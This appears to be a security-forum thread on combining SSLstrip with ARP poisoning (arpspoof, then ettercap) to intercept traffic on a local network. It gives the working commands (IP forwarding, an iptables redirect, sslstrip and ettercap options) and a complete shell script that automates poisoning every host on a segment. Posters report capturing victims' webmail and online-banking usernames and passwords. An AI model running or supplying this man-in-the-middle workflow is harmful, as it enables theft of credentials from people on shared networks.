There are a couple of posts in here about using SSLstrip with arpspoof. This is working fine on my BT3 box, but it has some drawbacks:
1- Arpspoof works on one target at a time, so if you are on a busy DHCP network, you have to use something like "netdiscover" in passive mode and manually arpspoof new targets on the fly.
2- You can use:
# arpspoof -i eth0 -t 192.168.0.255 192.168.0.1
where you ARP spoof the whole class C subnet, but guess what? The gateway will display an IP conflict warning message.
3- Arpspoof is compiled with "eth0" as the device to use; even if you use "-i eth1", the attack will fail. You have to modify the arp.c file and recompile arpspoof to make it work with other NIC names, or search for a compiled binary that has this issue resolved...
I would suggest the following steps (from the README file included with the sslstrip package):
a) Flip your machine into forwarding mode (as root):
echo "1" > /proc/sys/net/ipv4/ip_forward
b) Setup iptables to intercept HTTP requests (as root):
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <yourListenPort>
c) Run sslstrip with the command-line options you'd like.
python sslstrip.py -k -p -l <yourListenPort>
And instead of using arpspoof, use ettercap.
d) Run ettercap to redirect traffic to your machine:
ettercap -i eth1 -Tq -M ARP /192.168.0.1/ // // -P autoadd
We are telling ettercap to use "eth1", with terminal and quiet mode ("-Tq"), and to use the ARP poisoning attack ("-M ARP"). 192.168.0.1 is the gateway IP address, and finally we are using the autoadd plugin to add new targets ("-P autoadd").
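Steps a) to d) as one script, added here as an example (it is not code from the original post, nor from the sslstrip or ettercap projects). It checks the listen port, adds the nat REDIRECT rule only if it is not already present, confirms sslstrip actually started before poisoning anyone, and removes the rule, stops sslstrip and restores ip_forward on exit. Assumptions not in the post: it runs as root, sslstrip.py is in the current directory, iptables is 1.4.11 or newer (needed for "-C"), interface, gateway and listen port are taken from the arguments (the defaults eth1 and 192.168.0.1 follow the post; 10000 is an arbitrary choice for <yourListenPort>), and the ettercap line uses the documented TARGET1 TARGET2 form.

```shell
#!/bin/sh
# Added example, not code from the original post or from the sslstrip or
# ettercap projects: steps a) to d) as one script with a port check, an
# idempotent iptables rule, a liveness check on sslstrip, and cleanup.
#
# Assumptions: run as root, sslstrip.py is in the current directory,
# iptables >= 1.4.11 (for "-C"). Defaults eth1 / 192.168.0.1 follow the
# post; 10000 is an arbitrary choice for <yourListenPort>.
set -eu

# Port must be an integer in 1..65535. The same value feeds both the
# iptables --to-port and sslstrip -l; if they differ, redirected port-80
# traffic lands on a closed port and every victim's HTTP simply breaks.
valid_port() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# The nat rule from step b) without the -A/-C/-D verb, so one string serves
# to check for, add and delete it.
redirect_rule() {
    printf 'PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port %s' "$1"
}

# Step d) in ettercap's TARGET1 TARGET2 form: the gateway as target 1,
# "//" (every host on the segment) as target 2.
ettercap_cmd() {
    printf 'ettercap -i %s -Tq -M arp /%s/ // -P autoadd' "$1" "$2"
}

setup() {
    port="$1"
    valid_port "$port" || { echo "invalid listen port: $port" >&2; return 1; }

    # Step a), remembering the previous value so cleanup can put it back.
    ORIG_FWD=$(cat /proc/sys/net/ipv4/ip_forward)
    echo 1 > /proc/sys/net/ipv4/ip_forward

    # Step b), idempotent: "-C" returns 0 when an identical rule exists.
    # The unquoted $(...) is intentional: the rule must split into words.
    if ! iptables -t nat -C $(redirect_rule "$port") 2>/dev/null; then
        iptables -t nat -A $(redirect_rule "$port")
    fi

    # Step c) in the background; make sure it is still alive a moment
    # later (a listen port already in use makes it die immediately).
    python sslstrip.py -k -p -l "$port" &
    SSLSTRIP_PID=$!
    sleep 2
    if ! kill -0 "$SSLSTRIP_PID" 2>/dev/null; then
        echo "sslstrip did not start; not poisoning anything" >&2
        return 1
    fi
}

cleanup() {
    if [ -n "${SSLSTRIP_PID:-}" ]; then
        kill "$SSLSTRIP_PID" 2>/dev/null || true
    fi
    if [ -n "${LPORT:-}" ]; then
        iptables -t nat -D $(redirect_rule "$LPORT") 2>/dev/null || true
    fi
    if [ -n "${ORIG_FWD:-}" ]; then
        echo "$ORIG_FWD" > /proc/sys/net/ipv4/ip_forward
    fi
}

main() {
    IFACE="${1:-eth1}"
    GATEWAY="${2:-192.168.0.1}"
    LPORT="${3:-10000}"
    trap cleanup EXIT
    trap 'exit 130' INT TERM
    setup "$LPORT"
    # Foreground; pressing q in ettercap ends the session and fires cleanup.
    eval "$(ettercap_cmd "$IFACE" "$GATEWAY")"
}

# Only launch when asked, so the file can also be sourced for its helpers.
if [ "${SSLSTRIP_RUN:-0}" = "1" ]; then
    main "$@"
fi
```

Run it as `SSLSTRIP_RUN=1 ./sslstrip-mitm.sh eth1 192.168.0.1 10000`; quitting ettercap, or Ctrl-C, triggers the cleanup trap, so the box does not stay in forwarding mode with port 80 redirected after the session.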
Quoting from drakoth777:
take a look at the network-devices.rules, each NIC has its own MAC address that is tied to a certain interface name (eth0, eth1, etc). You can change all that in the network rules file.
If you get this working, you have to rename eth0 to something else before renaming eth1 to eth0. On the practical level, ettercap is the right tool. Or if arpspoof is easier for you, download the binary available in the forum. Search for "sslstrip & arpspoof".
Thanks for the reply.... I don't mind using ettercap.... anyway...... for others' information, the following code required a slight change for me:
python sslstrip.py -k -p -l <yourListenPort>
So, capital K & P were replaced by lower case.... btw I'm using BT3.
Not a problem at all......
OK, now some feedback on the efficiency of the script. I used BT3 as attacker & Vista Home SP1 as victim. After poisoning, BT3 can successfully capture mail user IDs & passwords (like gmail.com, mail.com, yahoo.com) and internet banking IDs & passwords (like Lloyds TSB, Barclays, HSBC). However, the victim can't log on to the internet bank account; even the 2nd security check page does not come up. So, it seems that our online banking is still safe...... any comments?
I think it has been patched in both Firefox & IE. Anybody think differently??
If you can't explain it simply, you don't understand it well enough -- Albert Einstein
Working for me:
Firefox 3.5, Windows XP SP3
~ Have you, g0tmi1k? ~
What do banks have running that other SSL sites don't?
After failing with arpspoof (I have eth1 and it only works with eth0; otherwise it gives the "arpspoof couldn't arp for host" error),
I tried ettercap and it works like a champ.
My victim's machine is XP SP3 with IE8. It shows gmail accounts, bank accounts, etc.
Thanks for posting.